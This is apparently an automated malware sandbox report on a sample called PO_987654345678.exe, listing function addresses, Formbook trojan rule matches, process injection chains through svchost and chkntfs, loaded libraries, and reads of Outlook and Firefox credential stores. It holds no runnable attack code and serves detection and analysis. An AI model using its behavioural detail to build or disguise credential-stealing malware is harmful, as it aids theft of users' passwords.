            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C20CB5 | 3_2_04C20CB5
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B80C00 | 3_2_04B80C00
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B98DBF | 3_2_04B98DBF
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B7ADE0 | 3_2_04B7ADE0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B8AD00 | 3_2_04B8AD00
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C1CD1F | 3_2_04C1CD1F
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C3EEDB | 3_2_04C3EEDB
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04B92E90 | 3_2_04B92E90
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04C3CE93 | 3_2_04C3CE93
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B80E593_2_04B80E59
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3EE263_2_04C3EE26
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BFEFA03_2_04BFEFA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B72FC83_2_04B72FC8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BA0F303_2_04BA0F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BC2F283_2_04BC2F28
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C22F303_2_04C22F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BF4F403_2_04BF4F40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B668B83_2_04B668B8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BAE8F03_2_04BAE8F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B828403_2_04B82840
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B8A8403_2_04B8A840
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B829A03_2_04B829A0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C4A9A63_2_04C4A9A6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B969623_2_04B96962
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B7EA803_2_04B7EA80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C36BD73_2_04C36BD7
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3AB403_2_04C3AB40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B714603_2_04B71460
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3F43F3_2_04C3F43F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C495C33_2_04C495C3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C1D5B03_2_04C1D5B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C375713_2_04C37571
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C316CC3_2_04C316CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BC56303_2_04BC5630
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3F7B03_2_04C3F7B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C2F0CC3_2_04C2F0CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3F0E03_2_04C3F0E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C370E93_2_04C370E9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B870C03_2_04B870C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B8B1B03_2_04B8B1B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C4B16B3_2_04C4B16B
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B6F1723_2_04B6F172
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB516C3_2_04BB516C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B852A03_2_04B852A0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C212ED3_2_04C212ED
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9D2F03_2_04B9D2F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9B2C03_2_04B9B2C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BC739A3_2_04BC739A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3132D3_2_04C3132D
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B6D34C3_2_04B6D34C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FCF23_2_04C3FCF2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BF9C323_2_04BF9C32
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9FDC03_2_04B9FDC0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C31D5A3_2_04C31D5A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C37D733_2_04C37D73
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B83D403_2_04B83D40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B89EB03_2_04B89EB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B81F923_2_04B81F92
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B43FD53_2_04B43FD5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B43FD23_2_04B43FD2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FFB13_2_04C3FFB1
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FF093_2_04C3FF09
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B838E03_2_04B838E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BED8003_2_04BED800
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C159103_2_04C15910
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B899503_2_04B89950
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9B9503_2_04B9B950
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C2DAC63_2_04C2DAC6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BC5AA03_2_04BC5AA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C21AA33_2_04C21AA3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C1DAAC3_2_04C1DAAC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C37A463_2_04C37A46
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FA493_2_04C3FA49
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BF3A6C3_2_04BF3A6C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9FB803_2_04B9FB80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BBDBF93_2_04BBDBF9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BF5BF03_2_04BF5BF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FB763_2_04C3FB76
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_00991E203_2_00991E20
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098CD103_2_0098CD10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098CD0A3_2_0098CD0A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098AFB03_2_0098AFB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098AFAE3_2_0098AFAE
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098CF303_2_0098CF30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009954D03_2_009954D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009936B03_2_009936B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009936AC3_2_009936AC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099366A3_2_0099366A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009ABBD03_2_009ABBD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049ED7933_2_049ED793
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049ED7C83_2_049ED7C8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049EE7603_2_049EE760
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049EE2A83_2_049EE2A8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E038E3_2_049E038E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049EE3C33_2_049EE3C3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049F532C3_2_049F532C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049ECA833_2_049ECA83
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F87E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F2B970 appears 262 times
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: String function: 00F1F9F2 appears 31 times
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: String function: 00F20A30 appears 46 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 04BEEA12 appears 86 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 04B6B970 appears 262 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 04BB5130 appears 58 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 04BFF290 appears 103 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 04BC7E54 appears 107 times
            Source: PO_987654345678.exe, 00000000.00000003.1655961378.00000000039E3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO_987654345678.exe
            Source: PO_987654345678.exe, 00000000.00000003.1656065998.0000000003B8D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO_987654345678.exe
            Source: PO_987654345678.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@17/11
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F737B5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F610BF AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F8A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F7648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Code function: 0_2_00F042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\PO_987654345678.exe | File created: C:\Users\user\AppData\Local\Temp\autDA7C.tmp
            Source: PO_987654345678.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.2029116161.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO_987654345678.exe | Virustotal: Detection: 37%
            Source: PO_987654345678.exe | ReversingLabs: Detection: 42%
            Source: unknown | Process created: C:\Users\user\Desktop\PO_987654345678.exe "C:\Users\user\Desktop\PO_987654345678.exe"
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO_987654345678.exe"
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe | Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PO_987654345678.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: ifsutil.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: devobj.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\chkntfs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PO_987654345678.exe | Static file information: File size 1250816 > 1048576
            Source: PO_987654345678.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PO_987654345678.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PO_987654345678.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PO_987654345678.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PO_987654345678.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PO_987654345678.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PO_987654345678.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000001.00000002.1850544431.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818824564.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000003.1790761770.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4117923087.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ftfqgrfncDSuar.exe, 00000002.00000002.4118133929.0000000000FCE000.00000002.00000001.01000000.00000004.sdmp, ftfqgrfncDSuar.exe, 00000007.00000000.1919962522.0000000000FCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_987654345678.exe, 00000000.00000003.1656395524.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, PO_987654345678.exe, 00000000.00000003.1656295045.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1754906173.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1756794184.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1856952103.0000000004997000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1854994235.00000000047E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_987654345678.exe, 00000000.00000003.1656395524.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, PO_987654345678.exe, 00000000.00000003.1656295045.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1754906173.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1756794184.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000003.00000002.4118749012.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1856952103.0000000004997000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1854994235.00000000047E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000001.00000002.1850544431.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818824564.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000003.1790761770.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4117923087.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000003.00000002.4119101815.000000000516C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000331C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019BFC000.00000004.80000000.00040000.00000000.sdmp
